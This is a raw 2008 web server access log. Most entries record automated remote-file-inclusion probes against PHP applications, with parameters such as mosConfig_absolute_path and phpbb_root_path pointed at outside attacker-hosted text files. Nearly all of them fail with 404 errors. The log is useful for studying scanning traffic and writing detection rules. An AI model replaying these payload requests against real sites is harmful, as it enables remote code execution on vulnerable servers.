210.245.166.92 - - [31/Jul/2008:07:04:19 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:04:20 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
12.196.98.16 - - [31/Jul/2008:07:04:32 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:07:04:32 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
81.25.54.205 - - [31/Jul/2008:07:05:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:05:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
208.75.225.10 - - [31/Jul/2008:07:05:38 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
58.65.228.5 - - [31/Jul/2008:07:05:47 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.apnic.net/index.html? HTTP/1.0" 404 286 "-""Mozilla/5.0"
210.245.166.92 - - [31/Jul/2008:07:05:57 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.adoradores.kit.net/general? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:05:59 -0500] "GET //ashnews.php?pathtoashnews=http://www.adoradores.kit.net/general? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:07:25 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:07:26 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.243.169.10 - - [31/Jul/2008:07:07:28 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
72.243.169.10 - - [31/Jul/2008:07:07:29 -0500] "GET //admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
59.125.211.84 - - [31/Jul/2008:07:08:40 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
59.125.211.84 - - [31/Jul/2008:07:08:41 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
90.3.115.62 - - [31/Jul/2008:07:08:57 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:07:08:58 -0500] "GET //skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:07:08:58 -0500] "GET /logs//skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:07:10:10 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:10:11 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:11:25 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:11:26 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
189.102.16.28 - - [31/Jul/2008:07:12:08 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:07:12:10 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
210.245.166.92 - - [31/Jul/2008:07:12:27 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.adoradores.kit.net/general? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:12:28 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.adoradores.kit.net/general? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:13:25 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:13:25 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
81.25.54.205 - - [31/Jul/2008:07:13:35 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:13:36 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
189.102.16.28 - - [31/Jul/2008:07:13:39 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:07:13:43 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
210.245.166.92 - - [31/Jul/2008:07:14:04 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.adoradores.kit.net/general? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:14:05 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.adoradores.kit.net/general? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
210.245.87.117 - - [31/Jul/2008:07:15:56 -0500] "GET //admin_words.php?phpbb_root_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
210.245.87.117 - - [31/Jul/2008:07:15:56 -0500] "GET /logs/access_log.1214265600//admin_words.php?phpbb_root_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
210.245.87.117 - - [31/Jul/2008:07:15:57 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
210.245.166.92 - - [31/Jul/2008:07:16:08 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:16:09 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:16:13 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:16:13 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
210.245.87.117 - - [31/Jul/2008:07:16:51 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:07:16:52 -0500] "GET //admin_words.php?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:07:16:52 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:07:16:53 -0500] "GET //admin_words.php?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
92.61.36.98 - - [31/Jul/2008:07:19:01 -0500] "GET /logs/access_log.1213142400%20%20/?path%5Bdocroot%5D=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
194.24.180.40 - - [31/Jul/2008:07:19:56 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
194.24.180.40 - - [31/Jul/2008:07:19:57 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 325 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
74.6.18.219 - - [31/Jul/2008:07:20:09 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.220 - - [31/Jul/2008:07:20:09 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.27.166 - - [31/Jul/2008:07:20:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ardentspace.com/idv6seph.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
80.67.27.166 - - [31/Jul/2008:07:20:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ardentspace.com/idv6seph.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
83.223.15.168 - - [31/Jul/2008:07:20:49 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
83.223.15.168 - - [31/Jul/2008:07:20:49 -0500] "GET /lostpasswd.php?env[include_prefix]=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
208.115.34.17 - - [31/Jul/2008:07:21:26 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ardentspace.com/idv6seph.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
208.115.34.17 - - [31/Jul/2008:07:21:26 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ardentspace.com/idv6seph.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
210.245.166.92 - - [31/Jul/2008:07:21:52 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:21:53 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
66.225.213.252 - - [31/Jul/2008:07:21:56 -0500] "GET /logs/access_log.1212883200/modules/my_egallery/index.php?do=showgall&gid=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.225.213.252 - - [31/Jul/2008:07:21:56 -0500] "GET /modules/my_egallery/index.php?do=showgall&gid=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
66.225.213.252 - - [31/Jul/2008:07:21:56 -0500] "GET /logs/modules/my_egallery/index.php?do=showgall&gid=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
59.163.101.53 - - [31/Jul/2008:07:22:13 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
59.163.101.53 - - [31/Jul/2008:07:22:15 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.90.87.65 - - [31/Jul/2008:07:22:17 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ardentspace.com/idv6seph.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
209.90.87.65 - - [31/Jul/2008:07:22:17 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ardentspace.com/idv6seph.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
210.245.166.92 - - [31/Jul/2008:07:22:39 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
59.163.101.53 - - [31/Jul/2008:07:22:39 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:07:22:40 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
59.163.101.53 - - [31/Jul/2008:07:22:44 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.67.26.157 - - [31/Jul/2008:07:23:40 -0500] "GET /logs/access_log.1212883200//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:07:23:40 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:07:23:40 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
210.245.166.92 - - [31/Jul/2008:07:24:08 -0500] "GET /logs//citywriter/head.php?path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:24:09 -0500] "GET //citywriter/head.php?path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:25:21 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.adoradores.kit.net/general? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:25:22 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.adoradores.kit.net/general? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
80.67.26.157 - - [31/Jul/2008:07:26:34 -0500] "GET /logs/access_log.1213315200//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.808"
210.245.166.92 - - [31/Jul/2008:07:27:37 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:27:38 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
195.93.201.102 - - [31/Jul/2008:07:28:33 -0500] "GET /logs/access_log.1212883200//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:07:28:34 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:07:28:35 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:07:28:46 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:28:47 -0500] "GET //atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:28:47 -0500] "GET /logs//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
201.130.79.130 - - [31/Jul/2008:07:28:50 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:28:50 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:28:51 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:28:52 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:28:57 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:28:58 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:07:29:50 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:07:29:50 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
88.214.192.28 - - [31/Jul/2008:07:29:52 -0500] "GET /logs/access_log.1212883200//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
88.214.192.28 - - [31/Jul/2008:07:29:53 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
153.19.161.46 - - [31/Jul/2008:07:29:56 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:07:29:57 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:07:29:58 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:07:29:58 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
88.214.192.28 - - [31/Jul/2008:07:29:59 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
81.25.54.205 - - [31/Jul/2008:07:30:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://217.33.34.85/FUJI/Styles/idd.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:30:09 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://217.33.34.85/FUJI/Styles/idd.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
194.109.22.108 - - [31/Jul/2008:07:30:36 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:30:37 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:07:30:37 -0500] "GET /logs//home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:30:37 -0500] "GET //home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
194.109.22.108 - - [31/Jul/2008:07:30:45 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:30:45 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
195.93.201.102 - - [31/Jul/2008:07:30:49 -0500] "GET /logs/access_log.1213315200//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
70.84.182.98 - - [31/Jul/2008:07:30:53 -0500] "GET /logs//home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:30:54 -0500] "GET //home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:30:54 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:30:54 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
194.109.22.108 - - [31/Jul/2008:07:30:55 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:30:55 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:31:02 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:31:02 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:07:31:02 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:03 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:06 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:06 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:07 -0500] "GET /logs//home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:07 -0500] "GET //home.php?act=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:08 -0500] "GET /logs//home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:08 -0500] "GET //home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.9.248.162 - - [31/Jul/2008:07:31:11 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.9.248.162 - - [31/Jul/2008:07:31:12 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:14 -0500] "GET /logs//home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:31:14 -0500] "GET //home.php?act=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
210.245.166.92 - - [31/Jul/2008:07:31:18 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:31:18 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.6.18.231 - - [31/Jul/2008:07:35:31 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.208.68.150 - - [31/Jul/2008:07:36:27 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
74.208.68.150 - - [31/Jul/2008:07:36:27 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:36:40 -0500] "GET /logs//home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:07:36:40 -0500] "GET //home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.55.208.137 - - [31/Jul/2008:07:37:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [31/Jul/2008:07:37:25 -0500] "GET /logs/access_log.1157414400 HTTP/1.1" 200 227501 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
58.65.228.5 - - [31/Jul/2008:07:37:43 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 324 "-""Mozilla/5.0"
58.65.228.5 - - [31/Jul/2008:07:38:52 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 324 "-""Mozilla/5.0"
194.109.22.108 - - [31/Jul/2008:07:39:14 -0500] "GET /logs//home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
